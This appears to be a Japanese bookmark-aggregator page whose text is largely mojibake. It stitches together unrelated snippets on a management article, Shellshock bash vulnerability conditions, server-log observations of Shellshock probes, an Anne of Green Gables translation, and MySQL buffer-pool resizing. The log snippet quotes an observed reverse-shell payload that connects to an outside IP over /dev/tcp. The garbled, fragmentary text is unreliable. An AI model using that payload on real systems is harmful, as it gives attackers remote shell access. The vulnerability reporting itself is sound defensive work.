ã¹ã¿ãããã£ãºãã¼ãªã©ãåªããä¼ç¤¾ã«å ±éãã¦ãããã¨ããå ±éè¨èªãããªãã®ã¯å±éºï¼å¼·ãçµç¹ãä½ããã¤ã³ã
ã¹ã¿ãããã£ãºãã¼ãªã©ãåªããä¼ç¤¾ã«å ±éãã¦ãããã¨ããå ±éè¨èªãããªãã®ã¯å±éºï¼å¼·ãçµç¹ãä½ããã¤ã³ã
2014-09-27: 該å½ãµã¤ãä¸ã«XSSããªãã¦ãæ»æå¯è½ã§ãããã¨ã id:mayuki ããã®ã³ã¡ã³ãã§å¤æãã¾ããã®ã§å ¨é¢çã«æ¸ãç´ãã¾ããããã¡ã¤ã¢ã¦ã©ã¼ã«å ã§ãã£ã¦ãæ»æè ã¯ãã¡ã¤ã¢ã¦ã©ã¼ã«å ã®Shellshockæ»æãéç¨ããCGIã®URLãããã£ã¦ããã ãã§æ»æå¯è½ã§ãã®ã§æ©æ¥ã«å¯¾å¿ãå¿ è¦ã§ãï¼ä¼ç¤¾ã®ããã°ã«ãæ¸ãã¦ã¾ããããã¡ã¤ã¢ã¦ã©ã¼ã«å ã«ç½®ãã¦ãããµã¼ãã§æ»æè ãç´æ¥ã¢ã¯ã»ã¹ã§ããªãããã¨ãã£ã¦bashã®æ´æ°ãæ ã£ã¦ããã¨ãæ¡ä»¶ã«ãã£ã¦ã¯æ»æãå¯è½ã¨ãªãã¾ãã æ¡ä»¶ã¨ãã¦ã¯ã ãã®ãµã¼ãã«ã¯ã·ã§ã«ãçµç±ãã¦å¤é¨ã³ãã³ããèµ·åããCGIçãåãã¦ãã(é常ã®Shellshockã®æ»æã¨åæ¡ä»¶) æ»æè ããã®URLãäºåã«ç¥ã£ã¦ãã(ãããã¯æ¨æ¸¬å¯è½) ã¨ãªãã¾ãã æ»æè ã¯ãã¦ã¼ã¶ã¼ãç½ URLã¸èªå°ãã以ä¸ã®ãããªJavaScriptãç½ ãã¼ã¸ä¸ã§åãããæ»æ対象ã®W
æ¡ä»¶1. /bin/shã®å®ä½ãbashã®ãã£ã¹ããªãã¥ã¼ã·ã§ã³ RHEL CentOS Scientific Linux Fedora Amazon Linux openSUSE Arch Linux (èªãè¨å®ããå ´å: Debian, Ubuntu) æ¡ä»¶2. åä½ç°å¢ CGI (ã¬ã³ã¿ã«ãµã¼ãã§ãããã¡ãªCGIã¢ã¼ãã®PHPçãå«ã) Passenger(Ruby) æ¡ä»¶3. ããã°ã©ã å 容 Passengerã¯å ¨æ»äº¡ *1 systemã `command`ã '| /usr/lib/sendmail' ãªã©ã§å¤é¨ã³ãã³ãå®è¡ *2 PHPã®mailãmb_send_mailããã®ä»ãã¬ã¼ã ã¯ã¼ã¯çãä»ããã¡ã¼ã«éä¿¡ *3 以ä¸ã¯æ¡ä»¶1ãä¸è¦ æ示çã«bashãå¼ã¶ å é 㧠#!/bin/bash ã #!/usr/bin/env bash ãã¦ããããã°ã©ã ãå®è¡ (rbenv
件ã®bashã®èå¼±æ§ãæ®ã£ã¦ãããã¨ãæå¾ ããã¢ã¯ã»ã¹ã«ã¤ãã¦ã24æéã»ã©åã«ã¯æ¥ã¦ãªãã£ããã§ãããããã»ã©ãã°ãè¦ã¦ã¿ããã¡ãã£ã¨ã ãæ¥ã¦ã¾ããã ãã°ã«æ®ãã®ã¯ User-Agent ããããªã®ã§ãããã»ãã®ãã£ã¼ã«ãã§è©¦ãã¦ãã輩ããããã¨ã§ãããã ã¢ã¯ã»ã¹å ãéå¼ããã¦ã¿ããã§ãããã¯ã©ã¦ããµã¼ãã¹ã°ã£ããã§ããï¼ä¸åã ã shodan.io ãªããã¡ã¤ã³ã®ä¸ã®IPã¢ãã¬ã¹ãããã£ãã®ã ãã©ããªãã ããâ¦â¦ï¼ã ãã¦ã() { :;}; ã®å¾ã«ãªã«ããã£ã¦ãã®ããã¨ããã®ãªãã§ãããä¸ã¤ THIS IS VULNERABLE 㨠echo ããã ãã¨ãã人ããã¾ãããè¦åã®ã¤ãããªã®ããæåã§ä½ã確èªãã¦ããã®ããªããã¨ã¯pingã ãªâ¦â¦ã¨æã£ã¦ããã§ãããã¡ãã£ã¨ç¹ç°ãªãã®ãã /bin/bash -i > /dev/tcp/198.206.15.239/8081 0>&1
ã¢ããããã®ç¤¾é·ããã®ãããã§ã赤æ¯ã®ã¢ã³ããåºçããããã¨ã«ãªã大å£åã®ãè±åã¨ã¢ã³ãã å®ã¯ãæ岡è±åã®è¨³ããã赤æ¯ã®ã¢ã³ãã«ã¯ã大ããªè¬ãããã 第37ç« ãæå¾ããã²ã¨ã¤åã®ç« ã ãã·ã¥ã¦ãå¿èçºä½ã§æ»ãã§ãã¾ãã ãã®æ©ãæ®ãããããªã©ã¯ã¢ã³ã«ãããã«èªåãã¢ã³ãæãã¦ããããèªãã ãã®ã·ã¼ã³ããæ岡è±åã¯è¨³ãã¦ããªãã®ã ã æ岡è±å訳ã赤æ¯ã®ã¢ã³ãã§ã¯ããããªã£ã¦ããã âãã®å£°ãèãã¤ããããªã©ãé¨å±ã«ã¯ãã£ã¦ãããäºäººã¯ã¨ãã«æ³£ããå¿ããèªããããæ °ããã£ãã äºæ¥ãã£ã¦ããããã·ã¥ã¦ã»ã¯ã¹ãã¼ãã¯å½¼ãèããçããããã¤ã«è²ã¦ãæ樹åãéã£ã¦éã°ãã¦ãã£ããâ ï¼èµ¤æ¯ã®ã¢ã³ãæ岡è±å訳ã»æ°æ½®æ庫ã»æåå åä¸å¹´åæä¸åæ¥ä¸ååå·P376ï¼ ãã®é¨åãåæã§ã¯ããã§ããã Marilla heard her and crept in to comfort her. "There
MySQL 5.7.5ã®æ°æ©è½ã ãã°è²¼ã£ã¦ããé·ããªã£ãã®ã§ããããã¡ãã¼ã«ãµã¤ãºãå°ããããã®ã¯å¥ã¨ã³ããªã¼ã¸ã çå±çã«ã¯ã - ãããã¡ãã¼ã«ã大ããããã¨ã * innodb_buffer_pool_chunk_size ãã¨ã«æ°ãããã¼ã¸ã確ä¿ããªããã´ãã§ã´ãã§ãã * ãã®å¦çä¸ã¯ *ãããã¡ãã¼ã«ã¸ã®å ¨ã¦ã®ã¢ã¯ã»ã¹ããããã¯ãããã* - ãããã¡ãã¼ã«ãå°ããããã¨ã * innodb_buffer_pool_chunk_size ãã¨ã«ãã¼ã¸ã追ãåºããªããã´ãã§ã´ãã§ãã ãããã http://dev.mysql.com/doc/refman/5.7/en/innodb-buffer-pool-online-resize.html ããããããã¡ãã¼ã«å¤§ããããæã®åä½ã¯InnoDBã®ãã©ãã£ãã¯å ¨æ» ã§ãã使ãNEEEE ã¨ããããªã³ã©ã¤ã³ã§ãããã¡ãã¼ã«ãµã¤ãºã
ã©ã³ãã³ã°
ã©ã³ãã³ã°
ã©ã³ãã³ã°
ãªãªã¼ã¹ãé害æ å ±ãªã©ã®ãµã¼ãã¹ã®ãç¥ãã
ææ°ã®äººæ°ã¨ã³ããªã¼ã®é ä¿¡
j次ã®ããã¯ãã¼ã¯
kåã®ããã¯ãã¼ã¯
lãã¨ã§èªã
eã³ã¡ã³ãä¸è¦§ãéã
oãã¼ã¸ãéã
{{#tags}}- {{label}}
{{/tags}}